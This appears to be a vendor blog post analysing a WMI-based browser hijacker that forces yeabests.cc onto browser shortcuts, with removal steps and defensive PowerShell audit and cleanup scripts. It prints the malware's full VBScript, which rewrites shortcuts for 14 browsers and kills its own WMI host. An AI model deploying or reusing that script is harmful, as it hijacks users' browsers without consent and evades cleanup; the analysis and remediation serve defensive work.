Recently, we discovered a browser hijacker that alters shortcuts by inserting an http://yeabests.cc argument. When you open your browser, you are presented with this site instead of your favorite search engine.

This is nothing new when it comes to browser hijacking; I would say it's a well-known trick. But I was fascinated by how this malware works and by the idea its authors came up with to stay undetected: altering your shortcuts over and over again after cleaning.
This so-called fileless malware lives inside WMI (Windows Management Instrumentation) or, more precisely, as a Visual Basic script inside the ActiveScriptEventConsumer class.
The script is executed by the WMI Standard Event Consumer scripting application, which can be found in the WMI folder in %system32%\wbem\scrcons.exe. Of course, this makes the script hard to detect since it uses a not-so-common WMI application scrcons.exe rather than the traditional JS application wscript.exe.
The built-in Windows application wbemtest.exe or WMIExplorer can be used to access this script.
Below is the content of the VBScript used to hijack browsers:
```vbscript
Dim objFS
Set objFS = CreateObject("Scripting.FileSystemObject")
On Error Resume Next
Const link = "http://yeabests.cc"
' Executable names the script treats as browsers
browsers = Array("IEXPLORE.EXE", "chrome.exe", "firefox.exe", "360chrome.exe", "360SE.exe", "SogouExplorer.exe", "opera.exe", "Safari.exe", "Maxthon.exe", "TTraveler.exe", "TheWorld.exe", "baidubrowser.exe", "liebao.exe", "QQBrowser.exe")
Set BrowserDic = CreateObject("scripting.dictionary")
For Each browser In browsers
    BrowserDic.Add LCase(browser), browser
Next
' Folders whose shortcuts are rewritten
Dim FoldersDic(12)
Set WshShell = CreateObject("Wscript.Shell")
FoldersDic(0) = "C:\Users\Public\Desktop"
FoldersDic(1) = "C:\ProgramData\Microsoft\Windows\Start Menu"
FoldersDic(2) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs"
FoldersDic(3) = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup"
FoldersDic(4) = "C:\Users\Rafael\Desktop"
FoldersDic(5) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Windows\Start Menu"
FoldersDic(6) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
FoldersDic(7) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
FoldersDic(8) = "C:\Users\Rafael\AppData\Roaming"
FoldersDic(9) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch"
FoldersDic(10) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu"
FoldersDic(11) = "C:\Users\Rafael\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar"
Set fso = CreateObject("Scripting.Filesystemobject")
For i = 0 To UBound(FoldersDic)
    For Each file In fso.GetFolder(FoldersDic(i)).Files
        If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
            Set oShellLink = WshShell.CreateShortcut(file.Path)
            path = oShellLink.TargetPath
            name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
            ' Shortcut points at a known browser: set its arguments to the URL
            If BrowserDic.Exists(LCase(name)) Then
                oShellLink.Arguments = link
                ' Clear the read-only attribute (1) so the shortcut can be saved
                If file.Attributes And 1 Then
                    file.Attributes = file.Attributes - 1
                End If
                oShellLink.Save
            End If
        End If
    Next
Next
' Terminate the WMI script host once the pass is finished
createobject("wscript.shell").run "cmd /c taskkill /f /im scrcons.exe", 0
```
As you can see, the malware is able to hijack 14 different browsers by checking their executables:
IEXPLORE.EXE
chrome.exe
firefox.exe
360chrome.exe
360SE.exe
SogouExplorer.exe
opera.exe
Safari.exe
Maxthon.exe
TTraveler.exe
TheWorld.exe
baidubrowser.exe
liebao.exe
QQBrowser.exe
Zemana AntiMalware removes this malware and cleans altered shortcuts.

Manual removal
The manual removal of this malware isn’t hard at all.
- Press the Windows button + R on your keyboard at the same time. Type wbemtest and click OK.
- The Windows Management Instrumentation Tester window will open. Click Connect.
- Type root\subscription.
- Click Open Class on the next window and type ActiveScriptEventConsumer.
- Now you need to click Instances.
- Finally, remove this malware.
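The same inspection can be done from an elevated PowerShell prompt. The script below is an added example, not part of the original analysis or of any product mentioned here: it lists every ActiveScriptEventConsumer in root\subscription together with the event filter bound to it, flags traits of the script shown above, and saves each script body before anything is deleted. The output folder name is an assumption.

```powershell
# Added example: read-only audit of permanent WMI event subscriptions.
# Run from an elevated PowerShell prompt.
$ns = 'root\subscription'

$consumers = Get-CimInstance -Namespace $ns -ClassName ActiveScriptEventConsumer
$bindings  = Get-CimInstance -Namespace $ns -ClassName __FilterToConsumerBinding
$filters   = Get-CimInstance -Namespace $ns -ClassName __EventFilter

$report = foreach ($c in $consumers) {
    # A binding references its consumer and filter by key (Name).
    # Assumption: consumer names are unique across consumer classes on this host.
    $bound = @($bindings | Where-Object { $_.Consumer.Name -eq $c.Name })
    $flt   = @($filters  | Where-Object { $bound.Filter.Name -contains $_.Name })

    [pscustomobject]@{
        Consumer        = $c.Name
        ScriptingEngine = $c.ScriptingEngine
        ScriptFileName  = $c.ScriptFileName
        BoundFilter     = $flt.Name -join ', '
        TriggerQuery    = $flt.Query -join ' | '
        # Traits of the script shown above: it rewrites .lnk files,
        # carries a URL, and kills its own host process.
        EditsShortcuts  = [bool]($c.ScriptText -match 'CreateShortcut')
        ContainsUrl     = [bool]($c.ScriptText -match 'https?://')
        KillsScrcons    = [bool]($c.ScriptText -match 'scrcons\.exe')
        ScriptLength    = "$($c.ScriptText)".Length
    }
}
$report | Format-List

# Keep a copy of each script body for analysis before deleting anything.
$outDir = Join-Path $env:TEMP 'wmi-consumer-scripts'   # hypothetical output folder
New-Item -ItemType Directory -Path $outDir -Force | Out-Null
foreach ($c in $consumers) {
    $safe = $c.Name -replace '[^\w.-]', '_'
    Set-Content -Path (Join-Path $outDir "$safe.txt") -Value $c.ScriptText
}

# Deleting a confirmed-malicious instance is what the wbemtest steps do by hand.
# -WhatIf only previews the deletion; drop it once the name is verified.
# $consumers | Where-Object Name -eq '<consumer name from the report>' |
#     Remove-CimInstance -WhatIf
```

The BoundFilter and TriggerQuery columns show what event causes the script to run, which is what makes the shortcuts change again after they are cleaned.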
The only thing left is to remove the argument from your browser shortcuts.
- Right-click the desired shortcut and select Properties.
- Remove http://yeabests.cc argument after “
- Click OK to apply changes.
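To check every shortcut at once instead of opening each one, the following added example (not from the original post) reads each .lnk file the same way the script does and reports browser shortcuts whose arguments are a bare URL. The function name `Get-HijackedShortcut` and its `-Clean` switch are hypothetical names chosen for this example.

```powershell
# Added example: find (and optionally clean) browser shortcuts whose
# arguments are a bare URL, the change made by the script shown earlier.
function Get-HijackedShortcut {
    param(
        [string[]]$Path,
        [string[]]$BrowserExe,
        [switch]$Clean          # hypothetical switch: also blank the arguments
    )
    $shell = New-Object -ComObject WScript.Shell
    Get-ChildItem -Path $Path -Filter *.lnk -Recurse -File -ErrorAction SilentlyContinue |
        ForEach-Object {
            $lnk = $shell.CreateShortcut($_.FullName)
            $exe = [IO.Path]::GetFileName($lnk.TargetPath)
            # -contains is case-insensitive, like the LCase() lookup in the script.
            # Only a bare URL is flagged; "--app=https://..." style arguments are left alone.
            if (($BrowserExe -contains $exe) -and ($lnk.Arguments -match '^\s*https?://')) {
                $found = [pscustomobject]@{
                    Shortcut  = $_.FullName
                    Target    = $lnk.TargetPath
                    Arguments = $lnk.Arguments
                    Cleaned   = $false
                }
                if ($Clean) {
                    $_.IsReadOnly = $false      # Save() fails on a read-only .lnk
                    $lnk.Arguments = ''
                    $lnk.Save()
                    $found.Cleaned = $true
                }
                $found
            }
        }
}

# Executable names taken from the script's browsers array.
$browsers = 'IEXPLORE.EXE','chrome.exe','firefox.exe','360chrome.exe','360SE.exe',
            'SogouExplorer.exe','opera.exe','Safari.exe','Maxthon.exe','TTraveler.exe',
            'TheWorld.exe','baidubrowser.exe','liebao.exe','QQBrowser.exe'

# Roots that cover the folders the script walks, resolved for the current user.
$roots = 'CommonDesktopDirectory','CommonStartMenu','DesktopDirectory','ApplicationData' |
    ForEach-Object { [Environment]::GetFolderPath($_) }

Get-HijackedShortcut -Path $roots -BrowserExe $browsers | Format-List
# After removing the WMI consumer, re-run with -Clean to blank the arguments.
```

Run it per user profile, since the per-user folders are resolved for whoever is logged on.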
Save yourself the hassle and install Zemana AntiMalware.
Additional Information:
Md5: a718bf376567abd3e7de06f31b036405
VirusTotal: Yeabests installer
You just saved my day! Thanks!